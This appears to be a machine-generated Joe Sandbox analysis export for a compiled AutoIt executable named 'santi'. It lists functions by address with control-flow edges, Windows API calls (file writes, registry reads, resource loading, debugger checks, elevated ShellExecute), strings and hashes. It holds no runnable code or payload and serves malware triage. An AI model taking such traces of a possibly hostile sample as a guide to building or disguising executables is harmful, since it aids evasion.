API calls 94634 2e2864 94633->94634 94635 2ed7f7 48 API calls 94634->94635 94636 2e2716 94635->94636 94636->94587 94638 2ed7f7 48 API calls 94637->94638 94639 2e287b 94638->94639 94640 2ed7f7 48 API calls 94639->94640 94641 2e2883 94640->94641 94642 2ed7f7 48 API calls 94641->94642 94643 2e285c 94642->94643 94643->94633 94644->94591 94646 2ed7f7 48 API calls 94645->94646 94647 2e26b0 94646->94647 94648 2ed7f7 48 API calls 94647->94648 94649 2e265f 94648->94649 94649->94599 94650->94627 94652 3519ba 94657 2fc75a 94652->94657 94656 3519c9 94658 2ed7f7 48 API calls 94657->94658 94659 2fc7c8 94658->94659 94665 2fd26c 94659->94665 94662 2fc865 94663 2fc881 94662->94663 94668 2fd1fa 48 API calls ___crtGetEnvironmentStringsW 94662->94668 94664 300f0a 52 API calls __cinit 94663->94664 94664->94656 94669 2fd298 94665->94669 94668->94662 94670 2fd28b 94669->94670 94671 2fd2a5 94669->94671 94670->94662 94671->94670 94672 2fd2ac RegOpenKeyExW 94671->94672 94672->94670 94673 2fd2c6 RegQueryValueExW 94672->94673 94674 2fd2fc RegCloseKey 94673->94674 94675 2fd2e7 94673->94675 94674->94670 94675->94674

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 643 30b043-30b080 call 30f8a0 646 30b082-30b084 643->646 647 30b089-30b08b 643->647 648 30b860-30b86c call 30a70c 646->648 649 30b0ac-30b0d9 647->649 650 30b08d-30b0a7 call 307bda call 307c0e call 306e10 647->650 651 30b0e0-30b0e7 649->651 652 30b0db-30b0de 649->652 650->648 656 30b105 651->656 657 30b0e9-30b100 call 307bda call 307c0e call 306e10 651->657 652->651 655 30b10b-30b110 652->655 661 30b112-30b11c call 30f82f 655->661 662 30b11f-30b12d call 313bf2 655->662 656->655 692 30b851-30b854 657->692 661->662 673 30b133-30b145 662->673 674 30b44b-30b45d 662->674 673->674 676 30b14b-30b183 call 307a0d GetConsoleMode 673->676 677 30b463-30b473 674->677 678 30b7b8-30b7d5 WriteFile 674->678 676->674 696 30b189-30b18f 676->696 681 30b479-30b484 677->681 682 30b55a-30b55f 677->682 684 30b7e1-30b7e7 GetLastError 678->684 685 30b7d7-30b7df 678->685 690 30b48a-30b49a 681->690 691 30b81b-30b833 681->691 687 30b663-30b66e 682->687 688 30b565-30b56e 682->688 686 30b7e9 684->686 685->686 693 30b7ef-30b7f1 686->693 687->691 700 30b674 687->700 688->691 694 30b574 688->694 697 30b4a0-30b4a3 690->697 698 30b835-30b838 691->698 699 30b83e-30b84e call 307c0e call 307bda 691->699 695 30b85e-30b85f 692->695 702 30b7f3-30b7f5 693->702 703 30b856-30b85c 693->703 704 30b57e-30b595 694->704 695->648 705 30b191-30b193 696->705 706 30b199-30b1bc GetConsoleCP 696->706 707 30b4a5-30b4be 697->707 708 30b4e9-30b520 WriteFile 697->708 698->699 709 30b83a-30b83c 698->709 699->692 710 30b67e-30b693 700->710 702->691 713 30b7f7-30b7fc 702->713 703->695 714 30b59b-30b59e 704->714 705->674 705->706 715 30b440-30b446 706->715 716 30b1c2-30b1ca 706->716 717 30b4c0-30b4ca 707->717 718 30b4cb-30b4e7 707->718 708->684 719 30b526-30b538 708->719 709->695 711 30b699-30b69b 710->711 720 30b6d8-30b719 WideCharToMultiByte 711->720 721 30b69d-30b6b3 711->721 723 30b812-30b819 call 307bed 713->723 724 30b7fe-30b810 call 307c0e 
call 307bda 713->724 725 30b5a0-30b5b6 714->725 726 30b5de-30b627 WriteFile 714->726 715->702 727 30b1d4-30b1d6 716->727 717->718 718->697 718->708 719->693 728 30b53e-30b54f 719->728 720->684 733 30b71f-30b721 720->733 730 30b6b5-30b6c4 721->730 731 30b6c7-30b6d6 721->731 723->692 724->692 735 30b5b8-30b5ca 725->735 736 30b5cd-30b5dc 725->736 726->684 738 30b62d-30b645 726->738 739 30b36b-30b36e 727->739 740 30b1dc-30b1fe 727->740 728->690 729 30b555 728->729 729->693 730->731 731->711 731->720 743 30b727-30b75a WriteFile 733->743 735->736 736->714 736->726 738->693 746 30b64b-30b658 738->746 741 30b370-30b373 739->741 742 30b375-30b3a2 739->742 747 30b200-30b215 740->747 748 30b217-30b223 call 301688 740->748 741->742 749 30b3a8-30b3ab 741->749 742->749 750 30b77a-30b78e GetLastError 743->750 751 30b75c-30b776 743->751 746->704 753 30b65e 746->753 754 30b271-30b283 call 3140f7 747->754 763 30b225-30b239 748->763 764 30b269-30b26b 748->764 757 30b3b2-30b3c5 call 315884 749->757 758 30b3ad-30b3b0 749->758 762 30b794-30b796 750->762 751->743 759 30b778 751->759 753->693 773 30b435-30b43b 754->773 774 30b289 754->774 757->684 777 30b3cb-30b3d5 757->777 758->757 765 30b407-30b40a 758->765 759->762 762->686 768 30b798-30b7b0 762->768 770 30b412-30b42d 763->770 771 30b23f-30b254 call 3140f7 763->771 764->754 765->727 769 30b410 765->769 768->710 775 30b7b6 768->775 769->773 770->773 771->773 783 30b25a-30b267 771->783 773->686 778 30b28f-30b2c4 WideCharToMultiByte 774->778 775->693 780 30b3d7-30b3ee call 315884 777->780 781 30b3fb-30b401 777->781 778->773 782 30b2ca-30b2f0 WriteFile 778->782 780->684 788 30b3f4-30b3f5 780->788 781->765 782->684 785 30b2f6-30b30e 782->785 783->778 785->773 787 30b314-30b31b 785->787 787->781 789 30b321-30b34c WriteFile 787->789 788->781 789->684 790 30b352-30b359 789->790 790->773 791 30b35f-30b366 790->791 791->781
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8d460e5f0b6b38ea9c22fbcd7fc62ec2e270872620305533a1f51d09fd3fe064
                                                                • Instruction ID: 055bce5593123b8cd7f2137a01b42ea47d9ea9f1cf05413bbe1ba6b8b6b990e7
                                                                • Opcode Fuzzy Hash: 8d460e5f0b6b38ea9c22fbcd7fc62ec2e270872620305533a1f51d09fd3fe064
                                                                • Instruction Fuzzy Hash: 0B326C75B022288FDB26CF15DC916E9B7B9FF4A310F5940D9E40AA7A91D7309E80CF52

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,002E3AA3,?), ref: 002E3D45
                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,002E3AA3,?), ref: 002E3D57
                                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,003A1148,003A1130,?,?,?,?,002E3AA3,?), ref: 002E3DC8
                                                                  • Part of subcall function 002E6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,002E3DEE,003A1148,?,?,?,?,?,002E3AA3,?), ref: 002E6471
                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,002E3AA3,?), ref: 002E3E48
                                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003928F4,00000010), ref: 00351CCE
                                                                • SetCurrentDirectoryW.KERNEL32(?,003A1148,?,?,?,?,?,002E3AA3,?), ref: 00351D06
                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0037DAB4,003A1148,?,?,?,?,?,002E3AA3,?), ref: 00351D89
                                                                • ShellExecuteW.SHELL32(00000000,?,?,?,?,002E3AA3), ref: 00351D90
                                                                  • Part of subcall function 002E3E6E: GetSysColorBrush.USER32(0000000F), ref: 002E3E79
                                                                  • Part of subcall function 002E3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 002E3E88
                                                                  • Part of subcall function 002E3E6E: LoadIconW.USER32(00000063), ref: 002E3E9E
                                                                  • Part of subcall function 002E3E6E: LoadIconW.USER32(000000A4), ref: 002E3EB0
                                                                  • Part of subcall function 002E3E6E: LoadIconW.USER32(000000A2), ref: 002E3EC2
                                                                  • Part of subcall function 002E3E6E: RegisterClassExW.USER32(?), ref: 002E3F30
                                                                  • Part of subcall function 002E36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002E36E6
                                                                  • Part of subcall function 002E36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002E3707
                                                                  • Part of subcall function 002E36B8: ShowWindow.USER32(00000000,?,?,?,?,002E3AA3,?), ref: 002E371B
                                                                  • Part of subcall function 002E36B8: ShowWindow.USER32(00000000,?,?,?,?,002E3AA3,?), ref: 002E3724
                                                                  • Part of subcall function 002E4FFC: _memset.LIBCMT ref: 002E5022
                                                                  • Part of subcall function 002E4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002E50CB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                • String ID: ()9$This is a third-party compiled AutoIt script.$runas
                                                                • API String ID: 438480954-3744312930
                                                                • Opcode ID: bd570246b66847f20157157b74019bf2af6fecfac986ef4b4895174f6b858f01
                                                                • Instruction ID: dd244255aef14e6cafa38439f365a0d020866118e828eb38b74f2a347841df24
                                                                • Opcode Fuzzy Hash: bd570246b66847f20157157b74019bf2af6fecfac986ef4b4895174f6b858f01
                                                                • Instruction Fuzzy Hash: 27512630EA42C8AACF13EBB2DC09EEE7B7D9F16744F444064F601671A2CAB046258F21

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1137 2fddc0-2fde4f call 2ed7f7 GetVersionExW call 2e6a63 call 2fdfb4 call 2e6571 1146 2fde55-2fde56 1137->1146 1147 3524c8-3524cb 1137->1147 1150 2fde58-2fde63 1146->1150 1151 2fde92-2fdea2 call 2fdf77 1146->1151 1148 3524e4-3524e8 1147->1148 1149 3524cd 1147->1149 1154 3524d3-3524dc 1148->1154 1155 3524ea-3524f3 1148->1155 1153 3524d0 1149->1153 1156 2fde69-2fde6b 1150->1156 1157 35244e-352454 1150->1157 1164 2fdec7-2fdee1 1151->1164 1165 2fdea4-2fdec1 GetCurrentProcess call 2fdf5f 1151->1165 1153->1154 1154->1148 1155->1153 1161 3524f5-3524f8 1155->1161 1162 352469-352475 1156->1162 1163 2fde71-2fde74 1156->1163 1159 352456-352459 1157->1159 1160 35245e-352464 1157->1160 1159->1151 1160->1151 1161->1154 1166 352477-35247a 1162->1166 1167 35247f-352485 1162->1167 1168 352495-352498 1163->1168 1169 2fde7a-2fde89 1163->1169 1171 2fdee3-2fdef7 call 2fe00c 1164->1171 1172 2fdf31-2fdf3b GetSystemInfo 1164->1172 1165->1164 1188 2fdec3 1165->1188 1166->1151 1167->1151 1168->1151 1173 35249e-3524b3 1168->1173 1174 2fde8f 1169->1174 1175 35248a-352490 1169->1175 1185 2fdf29-2fdf2f GetSystemInfo 1171->1185 1186 2fdef9-2fdf01 call 2fdff4 GetNativeSystemInfo 1171->1186 1179 2fdf0e-2fdf1a 1172->1179 1176 3524b5-3524b8 1173->1176 1177 3524bd-3524c3 1173->1177 1174->1151 1175->1151 1176->1151 1177->1151 1181 2fdf1c-2fdf1f FreeLibrary 1179->1181 1182 2fdf21-2fdf26 1179->1182 1181->1182 1187 2fdf03-2fdf07 1185->1187 1186->1187 1187->1179 1190 2fdf09-2fdf0c FreeLibrary 1187->1190 1188->1164 1190->1179
                                                                APIs
                                                                • GetVersionExW.KERNEL32(?), ref: 002FDDEC
                                                                • GetCurrentProcess.KERNEL32(00000000,0037DC38,?,?), ref: 002FDEAC
                                                                • GetNativeSystemInfo.KERNELBASE(?,0037DC38,?,?), ref: 002FDF01
                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 002FDF0C
                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 002FDF1F
                                                                • GetSystemInfo.KERNEL32(?,0037DC38,?,?), ref: 002FDF29
                                                                • GetSystemInfo.KERNEL32(?,0037DC38,?,?), ref: 002FDF35
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                • String ID:
                                                                • API String ID: 3851250370-0
                                                                • Opcode ID: f2581a125cc78e566509d1b9ab90ec33514895c488f640ec96dd1998bd2d3976
                                                                • Instruction ID: 5fc782b049eb61e549e29f28b500a9aef98a614fae9d55ac87e2092628eca249
                                                                • Opcode Fuzzy Hash: f2581a125cc78e566509d1b9ab90ec33514895c488f640ec96dd1998bd2d3976
                                                                • Instruction Fuzzy Hash: 8B61C5B181A388CFCF16CF6894C05E9BFB56F2A300F1985E8DC459F207C664C919CB66

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1209 2e406b-2e4083 CreateStreamOnHGlobal 1210 2e4085-2e409c FindResourceExW 1209->1210 1211 2e40a3-2e40a6 1209->1211 1212 354f16-354f25 LoadResource 1210->1212 1213 2e40a2 1210->1213 1212->1213 1214 354f2b-354f39 SizeofResource 1212->1214 1213->1211 1214->1213 1215 354f3f-354f4a LockResource 1214->1215 1215->1213 1216 354f50-354f6e 1215->1216 1216->1213
                                                                APIs
                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,002E449E,?,?,00000000,00000001), ref: 002E407B
                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002E449E,?,?,00000000,00000001), ref: 002E4092
                                                                • LoadResource.KERNEL32(?,00000000,?,?,002E449E,?,?,00000000,00000001,?,?,?,?,?,?,002E41FB), ref: 00354F1A
                                                                • SizeofResource.KERNEL32(?,00000000,?,?,002E449E,?,?,00000000,00000001,?,?,?,?,?,?,002E41FB), ref: 00354F2F
                                                                • LockResource.KERNEL32(002E449E,?,?,002E449E,?,?,00000000,00000001,?,?,?,?,?,?,002E41FB,00000000), ref: 00354F42
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                • String ID: SCRIPT
                                                                • API String ID: 3051347437-3967369404
                                                                • Opcode ID: cb54377ceee68fdab571279e9dab9af8b9f285f326c3ec99675e231b137f80cd
                                                                • Instruction ID: 6dd0058954eb5c5fab34264f07d269344e89ff4bc27b7433726c2f40b7b82b70
                                                                • Opcode Fuzzy Hash: cb54377ceee68fdab571279e9dab9af8b9f285f326c3ec99675e231b137f80cd
                                                                • Instruction Fuzzy Hash: 9D117C70640741BFEB269B66EC48F277BBDEBC5B51F10856DF602862A0DBB1DC009A20
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00352F49), ref: 00326CB9
                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 00326CCA
                                                                • FindClose.KERNEL32(00000000), ref: 00326CDA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: FileFind$AttributesCloseFirst
                                                                • String ID:
                                                                • API String ID: 48322524-0
                                                                • Opcode ID: 9819d360ca04c342c54bc8cbabf4ec4a4fbeab1317a41998ccf98285d800dd20
                                                                • Instruction ID: 57d8d14bbff26d76d39de28daea1f93a26352e7d5c9a81aa653d6255bb4675cf
                                                                • Opcode Fuzzy Hash: 9819d360ca04c342c54bc8cbabf4ec4a4fbeab1317a41998ccf98285d800dd20
                                                                • Instruction Fuzzy Hash: 92E012319145255782156738AC0A4A976ACDE0A339F104715F575C11D0E7F0994445D5
                                                                APIs
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002EE959
                                                                • timeGetTime.WINMM ref: 002EEBFA
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002EED2E
                                                                • TranslateMessage.USER32(?), ref: 002EED3F
                                                                • DispatchMessageW.USER32(?), ref: 002EED4A
                                                                • LockWindowUpdate.USER32(00000000), ref: 002EED79
                                                                • DestroyWindow.USER32 ref: 002EED85
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002EED9F
                                                                • Sleep.KERNEL32(0000000A), ref: 00355270
                                                                • TranslateMessage.USER32(?), ref: 003559F7
                                                                • DispatchMessageW.USER32(?), ref: 00355A05
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00355A19
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                • API String ID: 2641332412-570651680
                                                                • Opcode ID: 069d023ea52789635383c15747b0aba3e6a90406ffdd6349b500048bf9213b7a
                                                                • Instruction ID: 6fa5525db76bceb064149049e2f7a7e0db69b010273647b262e6351f8d61ce04
                                                                • Opcode Fuzzy Hash: 069d023ea52789635383c15747b0aba3e6a90406ffdd6349b500048bf9213b7a
                                                                • Instruction Fuzzy Hash: 8F62F270554380CFDB22DF25C895FAA77E8BF44304F59487DE9468B2A2DBB0E848CB52
                                                                APIs
                                                                • ___createFile.LIBCMT ref: 00315EC3
                                                                • ___createFile.LIBCMT ref: 00315F04
                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00315F2D
                                                                • __dosmaperr.LIBCMT ref: 00315F34
                                                                • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00315F47
                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00315F6A
                                                                • __dosmaperr.LIBCMT ref: 00315F73
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00315F7C
                                                                • __set_osfhnd.LIBCMT ref: 00315FAC
                                                                • __lseeki64_nolock.LIBCMT ref: 00316016
                                                                • __close_nolock.LIBCMT ref: 0031603C
                                                                • __chsize_nolock.LIBCMT ref: 0031606C
                                                                • __lseeki64_nolock.LIBCMT ref: 0031607E
                                                                • __lseeki64_nolock.LIBCMT ref: 00316176
                                                                • __lseeki64_nolock.LIBCMT ref: 0031618B
                                                                • __close_nolock.LIBCMT ref: 003161EB
                                                                  • Part of subcall function 0030EA9C: CloseHandle.KERNELBASE(00000000,0038EEF4,00000000,?,00316041,0038EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0030EAEC
                                                                  • Part of subcall function 0030EA9C: GetLastError.KERNEL32(?,00316041,0038EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0030EAF6
                                                                  • Part of subcall function 0030EA9C: __free_osfhnd.LIBCMT ref: 0030EB03
                                                                  • Part of subcall function 0030EA9C: __dosmaperr.LIBCMT ref: 0030EB25
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                • __lseeki64_nolock.LIBCMT ref: 0031620D
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00316342
                                                                • ___createFile.LIBCMT ref: 00316361
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0031636E
                                                                • __dosmaperr.LIBCMT ref: 00316375
                                                                • __free_osfhnd.LIBCMT ref: 00316395
                                                                • __invoke_watson.LIBCMT ref: 003163C3
                                                                • __wsopen_helper.LIBCMT ref: 003163DD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                • String ID: @
                                                                • API String ID: 3896587723-2766056989
                                                                • Opcode ID: 42855fe815953f375f277eb2c315027db5d1313443ae5bb0387e71f811e30cfe
                                                                • Instruction ID: abad7d2dfc9f73a854183faa7c4429c4991cc713edf9e48304d0bcfb986349e7
                                                                • Opcode Fuzzy Hash: 42855fe815953f375f277eb2c315027db5d1313443ae5bb0387e71f811e30cfe
                                                                • Instruction Fuzzy Hash: D9223371D046059BEB2F9FA8DC56BFD7B25EB58310F294628E8219B2E1C3358DC1C791

                                                                Control-flow Graph

                                                                APIs
                                                                • _wcscpy.LIBCMT ref: 0032FA96
                                                                • _wcschr.LIBCMT ref: 0032FAA4
                                                                • _wcscpy.LIBCMT ref: 0032FABB
                                                                • _wcscat.LIBCMT ref: 0032FACA
                                                                • _wcscat.LIBCMT ref: 0032FAE8
                                                                • _wcscpy.LIBCMT ref: 0032FB09
                                                                • __wsplitpath.LIBCMT ref: 0032FBE6
                                                                • _wcscpy.LIBCMT ref: 0032FC0B
                                                                • _wcscpy.LIBCMT ref: 0032FC1D
                                                                • _wcscpy.LIBCMT ref: 0032FC32
                                                                • _wcscat.LIBCMT ref: 0032FC47
                                                                • _wcscat.LIBCMT ref: 0032FC59
                                                                • _wcscat.LIBCMT ref: 0032FC6E
                                                                  • Part of subcall function 0032BFA4: _wcscmp.LIBCMT ref: 0032C03E
                                                                  • Part of subcall function 0032BFA4: __wsplitpath.LIBCMT ref: 0032C083
                                                                  • Part of subcall function 0032BFA4: _wcscpy.LIBCMT ref: 0032C096
                                                                  • Part of subcall function 0032BFA4: _wcscat.LIBCMT ref: 0032C0A9
                                                                  • Part of subcall function 0032BFA4: __wsplitpath.LIBCMT ref: 0032C0CE
                                                                  • Part of subcall function 0032BFA4: _wcscat.LIBCMT ref: 0032C0E4
                                                                  • Part of subcall function 0032BFA4: _wcscat.LIBCMT ref: 0032C0F7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                • String ID: >>>AUTOIT SCRIPT<<<$t29
                                                                • API String ID: 2955681530-3547193057
                                                                • Opcode ID: 36cbd3478801bd85be30e2c226aff36d5618a749850161ee01eed220ca87c2b8
                                                                • Instruction ID: 191a2b5ad4a055a6f71426c2612f9231ecddaa314b9815eb130086a83902e861
                                                                • Opcode Fuzzy Hash: 36cbd3478801bd85be30e2c226aff36d5618a749850161ee01eed220ca87c2b8
                                                                • Instruction Fuzzy Hash: E591D072504355AFDB26EB50D851F9FB3E8BF94300F004869F9899B292DB34EA54CF92

                                                                Control-flow Graph

                                                                APIs
                                                                • GetSysColorBrush.USER32(0000000F), ref: 002E3F86
                                                                • RegisterClassExW.USER32(00000030), ref: 002E3FB0
                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002E3FC1
                                                                • InitCommonControlsEx.COMCTL32(?), ref: 002E3FDE
                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002E3FEE
                                                                • LoadIconW.USER32(000000A9), ref: 002E4004
                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002E4013
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                • API String ID: 2914291525-1005189915
